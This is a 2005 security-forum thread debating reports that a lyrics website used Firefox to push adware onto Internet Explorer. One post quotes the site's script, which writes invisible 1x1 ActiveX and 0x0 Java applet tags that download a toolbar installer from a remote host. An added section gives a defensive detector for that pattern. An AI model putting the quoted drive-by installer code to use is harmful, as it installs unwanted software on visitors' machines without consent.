Firefox Spyware Infects IE?


musicman
March 13th, 2005, 09:36 PM
I thought this would be of interest to our members as I read this report from another security forum.
========================================================

-{ Quote: "What if there was an infection out there that could bypass Firefox and still get its grubby little paws on IE, and from there, the heart of your OS? What if that same infection could get past not only FF, but a whole raft of other (supposedly more secure) browsers too?

What if, of all people, Neil Diamond was indirectly involved in this craziness?

Unfortunately, this has now become a reality and woe betide anyone looking for lyrics from Neil's latest hit. You're more likely to end up with a nasty case of browseritis. After hearing rumours of a Firefox Adware bundle from this thread, I thought I'd go check it out. The results were, as they say, a right kick in the pants." }-

paperghost's article can be found here, at Vital Security.org - Firefox Spyware infects IE? (http://www.vitalsecurity.org/2005/03/firefox-spyware-infects-ie.html)


Edit Note - Please do not copy & paste an entire article - a summary or paragraph from the article is enough. Also, a link to the original source should be included. - snap

bigbuck
March 14th, 2005, 12:59 AM
Take a look here.... with links to the Coyote thread
http://www.wilderssecurity.com/showthread.php?t=70025

nadirah
March 14th, 2005, 01:23 AM
From spywareinfoforum.com:

-{ Quote: "Quick! Run for the hills! Firefox spyware is running rampant and infecting every computer in sight!

*sigh*

Sometimes I just want to bang my head on the desk and keep doing it until the desk surrenders unconditionally. If you were to believe several online news sites, there is an epidemic of spyware infecting Internet Explorer by way of Firefox. If you were also to believe that these accounts were written by competent journalists who have checked their facts, you would be wrong on both counts." }- Spywareinfo Newsletter Mar13/05 (http://www.spywareinfoforum.com/newsletter/archives/2005/mar13.php#firefox)

cluelessnewbie
March 14th, 2005, 08:11 AM
-{ Quote: "From spywareinfoforum.com:

Spywareinfo Newsletter Mar13/05 (http://www.spywareinfoforum.com/newsletter/archives/2005/mar13.php#firefox)" }-

Yeah, our very own bunch of "Experts" on this forum were muttering about scripts and whatnot in the thread "a new theory", when I tried to point out that it was just JAVA. But of course, I was ignored cos I'm a newbie.

Bubba
March 14th, 2005, 08:57 AM
-{ Quote: "Yeah, our very own bunch of "Experts" on this forum were muttering about scripts and whatnot in the thread "a new theory", when I tried to point out that it was just JAVA. But of course, I was ignored cos I'm a newbie." }-

Having re-read the original Wilders thread that I'm assuming you are referring to concerning this exploit....the script comments were mentioned if for no other reason than to caution IE users not to visit that site with Active script enabled because the java applet would be loaded along with a toolbar.

Opinions may vary....but I would hardly call any posts directed toward your posts as being dismissed. I also am of the opinion one can not BS a BS concerning...."I was ignored cos I'm a newbie" ;)

Do not visit the below links without being properly secured

Visiting lyricspy.com with Active script enabled executes the below code:

<script language='JavaScript' type='text/JavaScript'
src='http://www.ysbweb.com/ist/scripts/ysb_prompt.php?
retry=2&loadfirst=1&delayload=0&software_id=10&account_id=1001958&
recurrence=always&adid=a1110115353&event_type=onload&user_level=3'>
</script>

Which then executes the below code:

function showActiveX() {
holder.write('<OBJECT id="barobject" width=1 height=1
classid="CLSID:42F2C9BA-614F-47c0-B3E3-ECFD34EED658"');
holder.write
('codebase="http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab"
onerror="parent.retryit();">');

holder.write('<PARAM name="account_id" value="1001958">');
holder.write('<PARAM name="download_key"
value="df42914d752e3362ade7e24cced39c71">');
holder.write('<PARAM name="download_lock" value="1110807725">');
holder.write('<PARAM name="cfg" value="ysb_l3">');
holder.write('<PARAM name="sub" value="">');
holder.write('</OBJECT>');
}

function showJava() {

holder.write('<APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar" code="javainstaller.InstallerApplet.class" name="InstallerApplet" width="0" height="0" hspace="0" vspace="0" align="middle">');
holder.write('<PARAM name="account_id" value="1001958">');
holder.write('<PARAM name="download_key" value="df42914d752e3362ade7e24cced39c71">');
holder.write('<PARAM name="download_lock" value="1110807725">');
holder.write('<PARAM name="cfg" value="ysb_l3">');
holder.write('<PARAM name="sub" value="">');
holder.write('</APPLET>');
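
Added example, not part of the original thread or of any poster's code: a static check a defender could run over saved page script to spot the pattern quoted above, where script-written OBJECT or APPLET tags fetch a remote .cab or .jar and are sized to be invisible. The sample input is constructed; the host example.invalid, the all-zero CLSID, the file names and the function names are assumptions.

```javascript
// Constructed sample (not the script from the thread): host, CLSID and file
// names are placeholders.
const SAMPLE = `
holder.write('<OBJECT id="bar" width=1 height=1 classid="CLSID:00000000-0000-0000-0000-000000000000"');
holder.write('codebase="http://example.invalid/pkg/toolbar.cab" onerror="parent.retryit();">');
holder.write('</OBJECT>');
holder.write('<APPLET Archive="http://example.invalid/pkg/installer.jar" code="x.Installer.class" width="0" height="0">');
holder.write('</APPLET>');
holder.write('<OBJECT width=400 height=300 data="movie.swf"></OBJECT>');
`;

// Rebuild the markup a browser would see: successive write() calls append
// their string arguments back to back, so one tag can span several calls.
function markupFromWrites(source) {
  const call = /\.write\s*\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*\)/gs;
  let html = "";
  for (const m of source.matchAll(call)) html += m[2].replace(/\\(.)/gs, "$1");
  return html;
}

function parseAttrs(text) {
  const attrs = {};
  const re = /([a-z][\w:-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  for (const m of text.matchAll(re)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Flag OBJECT/APPLET tags that pull a remote .cab or .jar, and note whether
// the element is sized to be invisible (0 or 1 pixel), as in the quoted script.
function findInstallerEmbeds(source) {
  const html = markupFromWrites(source);
  const findings = [];
  for (const m of html.matchAll(/<(object|applet)\b([^>]*)>/gi)) {
    const attrs = parseAttrs(m[2]);
    const payload = attrs.codebase || attrs.archive || "";
    if (!/^https?:\/\/\S+\.(cab|jar)([?#]|$)/i.test(payload)) continue;
    const hidden = parseInt(attrs.width, 10) <= 1 && parseInt(attrs.height, 10) <= 1;
    findings.push({ tag: m[1].toLowerCase(), payload, hidden, classid: attrs.classid || null });
  }
  return findings;
}

console.log(findInstallerEmbeds(SAMPLE));
```

On the constructed sample it reports the 1x1 OBJECT and the 0x0 APPLET and skips the ordinary 400x300 OBJECT that has no remote codebase.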

Bubba
March 14th, 2005, 09:02 AM
Since we already have an ongoing thread concerning this issue from last week....I'll ask those that wish to continue the discussion Please visit the below link. This thread is now closed.

This link---> New Theory about Infections and Spyware (http://www.wilderssecurity.com/showthread.php?t=70025)